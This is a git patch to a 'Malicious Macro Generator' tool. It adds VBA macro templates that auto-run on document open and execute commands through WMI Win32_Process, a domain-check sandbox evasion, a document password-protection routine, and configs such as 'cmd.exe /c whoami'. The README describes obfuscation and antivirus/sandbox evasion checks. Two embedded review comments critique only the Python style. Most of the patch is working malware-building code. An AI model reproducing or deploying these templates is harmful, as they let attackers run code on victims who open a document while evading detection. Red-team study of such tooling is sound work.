From 112adc7f47bc62270d5f5882a3a91b80a76e059e Mon Sep 17 00:00:00 2001 From: chamilton Date: Fri, 11 Nov 2016 19:20:01 -0500 Subject: [PATCH] Added WMI support --- README.md | 12 ++--- configs/wmi-cmd-evasion.json | 14 ++++++ configs/wmi-cmd.json | 12 +++++ lib/helper.py | 26 +++++++++- templates/evasions/password.vba | 10 ++++ .../payloads/wmi-cmd-evasion-template.vba | 47 +++++++++++++++++++ templates/payloads/wmi-cmd-template.vba | 45 ++++++++++++++++++ 7 files changed, 158 insertions(+), 8 deletions(-) create mode 100644 configs/wmi-cmd-evasion.json create mode 100644 configs/wmi-cmd.json create mode 100644 templates/evasions/password.vba create mode 100644 templates/payloads/wmi-cmd-evasion-template.vba create mode 100644 templates/payloads/wmi-cmd-template.vba diff --git a/README.md b/README.md index dd8a559..224c37f 100644 --- a/README.md +++ b/README.md @@ -5,20 +5,21 @@ Simple utility design to generate obfuscated macro that also include a AV / Sand #Requirement ``` Python 2.7 -Python 3.4 (Not supported yet) ``` #Usage ``` MMG.Malicious Macro Generator v2.0 - RingZer0 Team -Author: Mr.Un1k0d3r mr.un1k0d3r@gmail.com +Author: Mr.Un1k0d3r -Usage: MMG.py [config] [output] +Usage: MMG.py [config] [output] (optional -list) config Config file that contain generator information output Output filename for the macro + -list List all available payloads and evasion techniques + -python MMG.py configs/genric-cmd.json malicious.vba +python MMG.py configs/generic-cmd.json malicious.vba ``` #Config file @@ -53,7 +54,7 @@ The macro is looking for the total disk space. VMs and test machines use small d The macro is looking for the total memory size. Vms and test machines use less resources. -###### Uptime check +###### Uptime check The macro is looking for the system uptime. Sandboxes will return a short uptime. 
@@ -67,5 +68,4 @@ The python script will also generate obfuscated code to avoid heuristic detectio Mr.Un1k0d3r RingZer0 Team https://ringzer0team.com -charles.hamilton@mandiant.com diff --git a/configs/wmi-cmd-evasion.json b/configs/wmi-cmd-evasion.json new file mode 100644 index 0000000..fdbe386 --- /dev/null +++ b/configs/wmi-cmd-evasion.json @@ -0,0 +1,14 @@ +{ + "description": "Command exec payload using WMI Win32_Process class\nEvasion technique set to domain check", + "template": "templates/payloads/wmi-cmd-evasion-template.vba", + "varcount": 150, + "encodingoffset": 4, + "chunksize": 200, + "encodedvars": { + "DOMAIN":"RINGZER0" + }, + "vars": [], + "evasion": ["encoder", "domain"], + "payload": "cmd.exe /c whoami" +} + diff --git a/configs/wmi-cmd.json b/configs/wmi-cmd.json new file mode 100644 index 0000000..4912e3c --- /dev/null +++ b/configs/wmi-cmd.json @@ -0,0 +1,12 @@ +{ + "description": "Command exec payload using WMI Win32_Process class\nEvasion technique set to none", + "template": "templates/payloads/wmi-cmd-template.vba", + "varcount": 150, + "encodingoffset": 4, + "chunksize": 200, + "encodedvars": {}, + "vars": [], + "evasion": ["encoder"], + "payload": "cmd.exe /c your payload" +} + diff --git a/lib/helper.py b/lib/helper.py index 220e47d..34423b5 100644 --- a/lib/helper.py +++ b/lib/helper.py @@ -1,5 +1,6 @@ import json import os +import glob class Helper: VERSION = "2.0" 
@@ -11,12 +12,16 @@ class Helper: self.config = {} def ValidateArgv(self): + if "-list" in self.argv: + self.ListModules() + exit(0) + if len(self.argv) < 3: self.HelpMenu() self.ExitShowError("Missing arguments.") def HelpMenu(self): - print "Usage: %s [config] [output]\n\n\tconfig\tConfig file that contain generator information\n\toutput\tOutput filename for the macro" % self.argv[0] + print "Usage: %s [config] [output] (optional -list)\n\n\tconfig\tConfig file that contain generator information\n\toutput\tOutput filename for the macro\n\t-list\tList all available payloads and evasion techniques" % self.argv[0] def Banner(self): print "MMG.Malicious Macro Generator v%s - RingZer0 Team\nAuthor: Mr.Un1k0d3r mr.un1k0d3r@gmail.com\n" % Helper.VERSION @@ -63,4 +68,21 @@ class Helper: except: self.ExitShowError("Failed to save \"%s\"." % filename) self.PrintSuccess("\"%s\" successfully saved to the disk." % filename) - return self \ No newline at end of file + return self + + def ListModules(self): + path = os.path.dirname(os.path.realpath(__file__)) + payloadPath = path + "/../templates/payloads/" + evasionPath = path + "/../templates/evasions/" + + self.PrintSuccess("List of available payloads") + self.GlobFolder(payloadPath) + + print "\n" + self.PrintSuccess("List of available evasion techniques") + self.GlobFolder(evasionPath) + + def GlobFolder(self, path): + for file in glob.glob(path + "*"): + print "\t" + file.replace(path, "") + \ No newline at end of file diff --git a/templates/evasions/password.vba b/templates/evasions/password.vba new file mode 100644 index 0000000..718d0c2 --- /dev/null +++ b/templates/evasions/password.vba 
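Review bot: `exit(0)` in the new `-list` branch of ValidateArgv is the interactive helper that the `site` module injects, not a language builtin, so it is missing under `python -S` and in some embedded or frozen interpreters; the intended call is `sys.exit(0)`, with `import sys` added to the module header (the visible import block carries only json, os and glob). The `"-list" in self.argv` test matches the switch at any position, which is fine for a single optional flag but silently wins over any config and output arguments passed alongside it, so a one-line comment such as `# -list is handled before the positional-argument check and exits` would make the precedence explicit for the next reader. HelpMenu's new usage string describes the flag as optional but does not say where it goes, which that comment would also cover. The enclosing class Helper continues outside the hunk.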
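Review bot: GlobFolder's loop variable `file` shadows the Python 2 builtin of the same name, and stripping the directory with `file.replace(path, "")` only works because glob returns entries carrying exactly the prefix that was passed in, which `os.path.basename` expresses directly without that dependency. ListModules has the same hand-rolled path handling, `path + "/../templates/payloads/"`, where `os.path.join(path, "..", "templates", "payloads")` is the portable form. A drop-in GlobFolder would be `for entry in sorted(glob.glob(os.path.join(path, "*"))):` followed by `print "\t" + os.path.basename(entry)`, where the sort is a small addition because glob order is filesystem-dependent. Two smaller points: `print "\n"` in ListModules emits two blank lines where a bare `print` gives one, and the `"*"` pattern will also list subdirectories or non-template files if any are ever added to those folders, so a `*.vba` pattern may be what is meant, though that cannot be confirmed from this hunk. The enclosing class Helper starts outside the hunk.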
@@ -0,0 +1,10 @@ +[use:password_protect] + +Function password_protect(password_protect1 As String) As String + Dim password_protect2 As String + password_protect2 = "data1" + ActiveDocument.Password = decode(password_protect2) + password_protect2 = "data2" + ActiveDocument.Save + password_protect = password_protect2 +End Function \ No newline at end of file diff --git a/templates/payloads/wmi-cmd-evasion-template.vba b/templates/payloads/wmi-cmd-evasion-template.vba new file mode 100644 index 0000000..854ee95 --- /dev/null +++ b/templates/payloads/wmi-cmd-evasion-template.vba @@ -0,0 +1,47 @@ +[use:payload_wrapper] +[use:exec] +[use:init_wmi] + +Sub AutoOpen() + Dim var1 As String + Dim var2 As Object + Dim var3 As Integer + Dim var4 As String + Dim var5 as String + + var3 = [int1] + var1 = func_evasion_domain() + If (var1 = "bool1") Then + var5 = init_wmi("data1") + Set var2 = GetObject(var5) + var4 = payload_wrapper("data1") + var4 = exec(var2, var4, var3) + End If +End Sub + +Function payload_wrapper(payload_wrapper1 As String) As String + Dim payload_wrapper2 As String + [payload] + payload_wrapper2 = [payload_args] + payload_wrapper2 = decode(payload_wrapper2) + payload_wrapper = payload_wrapper2 +End Function + +Function exec(exec1 As Object, exec2 As String, exec3 As Integer) As String + Dim exec4 As String + Dim exec5 As Integer + exec5 = [smallint1] + exec4 = exec2 + If (exec3 > exec5) Then + exec5 = exec3 - exec3 + exec1.Create(exec4) + End If + exec4 = "exec6" + exec = exec4 +End Function + +Function init_wmi(init_wmi1 As String) As String + Dim init_wmi2 As String + init_wmi2 = decode("{[winmgmts:Win32_Process]}") + init_wmi = init_wmi2 +End Function \ No newline at end of file diff --git a/templates/payloads/wmi-cmd-template.vba b/templates/payloads/wmi-cmd-template.vba new file mode 100644 index 0000000..c13906d --- /dev/null +++ b/templates/payloads/wmi-cmd-template.vba 
@@ -0,0 +1,45 @@ +[use:payload_wrapper] +[use:exec] +[use:init_wmi] + +Sub AutoOpen() + Dim var1 As String + Dim var2 As Object + Dim var3 As Integer + Dim var4 As String + Dim var5 as String + + var3 = [int1] + var1 = "{[Wscript.Shell]}" + var5 = init_wmi("data1") + Set var2 = GetObject(var5) + var4 = payload_wrapper("data1") + var4 = exec(var2, var4, var3) +End Sub + +Function payload_wrapper(payload_wrapper1 As String) As String + Dim payload_wrapper2 As String + [payload] + payload_wrapper2 = [payload_args] + payload_wrapper2 = decode(payload_wrapper2) + payload_wrapper = payload_wrapper2 +End Function + +Function exec(exec1 As Object, exec2 As String, exec3 As Integer) As String + Dim exec4 As String + Dim exec5 As Integer + exec5 = [smallint1] + exec4 = exec2 + If (exec3 > exec5) Then + exec5 = exec3 - exec3 + exec1.Create(exec4) + End If + exec4 = "exec6" + exec = exec4 +End Function + +Function init_wmi(init_wmi1 As String) As String + Dim init_wmi2 As String + init_wmi2 = decode("{[winmgmts:Win32_Process]}") + init_wmi = init_wmi2 +End Function \ No newline at end of file